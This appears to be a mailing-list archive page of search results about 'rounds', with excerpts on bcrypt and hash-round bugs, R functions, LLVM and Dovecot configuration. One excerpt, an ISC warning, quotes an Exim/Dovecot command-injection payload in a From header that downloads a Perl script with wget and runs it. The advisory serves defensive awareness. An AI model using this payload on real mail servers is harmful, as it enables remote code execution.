Displaying 10 results from an estimated 10 matches similar to: "as.numeric rounds up"
2013 May 02
3
[Bug 2097] New: if gensalt's log_rounds parameter is set to 31 it does 0 (ZERO) rounds!
https://bugzilla.mindrot.org/show_bug.cgi?id=2097
Bug ID: 2097
Summary: if gensalt's log_rounds parameter is set to 31 it does
0 (ZERO) rounds!
Classification: Unclassified
Product: jBCrypt
Version: unspecified
Hardware: All
OS: All
Status: NEW
Severity: security
2013 Jun 09
1
from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted
Exim/Dovecot exploit attempt against his email server. The exploit partially
looked like this:
From:
x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com
(Obviously edited for your safety, and I didn't post the whole thing.)
This is an exploit against Dovecot that is using
2002 Dec 15
0
[LLVMdev] Re: llvm-gcc goes 10 rounds against the GNU mascot and loses, film at 11
Brian was kind enough to test llvmgcc against a bunch of GNU code. This
exposed all kinds of bugs, fixes below.
> recode -- fails (bad headers, many ICEs)
Can you give me a list of headers it wants? It's usally pretty easy to
add them if I know what it needs...
> cpio -- fails (dstring.c -- weird ssa bug)
Fixed. This was a C frontend bug (problem assigning temporary reg nums).
2002 Mar 12
1
rbinom silently rounds size argument (PR#1377)
rbinom (in R-1.4.1) silently rounds its "size" argument.
The C code contains
n = floor(nin + 0.5);
I would argue that this should this either be documented or changed (to
return NA). (The behavior is inconsistent with dbinom).
I sent this in to the devel list a couple of weeks ago to
provoke discussion; no disagreement (or agreement) so I'm
submitting it as a bug.
2014 Jan 08
0
Hash rounds in /etc/libuser.conf won't work - how to report a bug
Two weeks ago I reported a problem I was having in the CentOS 5 Security Support forum. I could not get hash rounds, configured in /etc/libuser.conf, to work on CentOS release 5.10 (Final), 2.6.18-371.3.1.el5 x86_64. The details are here:
https:// www.centos.org/forums/viewforum.php?f=24&sid=44859638070165ed5d8d9c35cdbe0378
I read all the documentation and looked for more off the CentOS
2014 Jan 09
0
Hash rounds in /etc/libuser.conf won't work
Two weeks ago I reported a problem I was having in the CentOS 5 Security Support forum. I could not get hash rounds, configured in /etc/libuser.conf, to work on CentOS release 5.10 (Final), 2.6.18-371.3.1.el5 x86_64. The details are here:
https://www.centos.org/forums/viewtopic.php?f=24&t=44245&sid=975951a5a0eb264945bbf550ea076278
I read all the documentation and looked for more off the
2009 Jul 30
1
Continue to finish for loop even there is an error in one of rounds.
I am trying to fit a logistic model to my 10 year data (1999-2008) by year. Codes like below:
Year <- c(1999: 2008)
for(y in 1:length(year)) {
file.input <- paste("C:\\", year[y], "\\data.csv", sep="")
table <- read.csv(file=fileinput, header=TRUE, as.is=TRUE, na.strings=c(""))
initial <- getInitial(percent ~ SSlogis(age, Asym,
2018 Sep 26
0
Can't authenticate using ARGON2ID crypt scheme from doveadm pw w/rounds != default
The reason it fails is because auth process runs out of memory and there
is a bug in libsodium which causes it to crash in this scenario. The fix
is to do
service auth {
? vsz_limit = 0 # or 2G at least
}
Aki
On 26.09.2018 09:12, Keith Amidon wrote:
> I'm using dovecot version 2.3.2.1 (0719df592) and trying to use the
> ARGON2ID crypt scheme for authentication using the passdb
2018 Sep 26
2
Can't authenticate using ARGON2ID crypt scheme from doveadm pw w/rounds != default
I'm using dovecot version 2.3.2.1 (0719df592) and trying to use the
ARGON2ID crypt scheme for authentication using the passdb passwd-file
driver. My passdb config is very simple:
??? passdb {
????? driver = passwd-file
????? args = username_format=%u <path-to-file-here>
??? }
If I generate a password this way:
??? doveadm pw -s ARGON2ID -p 'This is a test'
I get a crypt
2014 Feb 04
0
Password hash rounds solved - important security implications
A member of the scientific-linux-users at fnal.gov wrote:
On 01/14/2014 04:19 PM, George Shaffer wrote:
> > If anyone has gotten password hash rounds using hash_rounds_min and
> > hash_rounds_max in libuser.conf, or the counter part in login.defs
> > (SHA_CRYPT_MIN_ROUNDS, SHA_CRYPT_MAX_ROUNDS), to work on any RHEL related
> > distribution, I would appreciate knowing how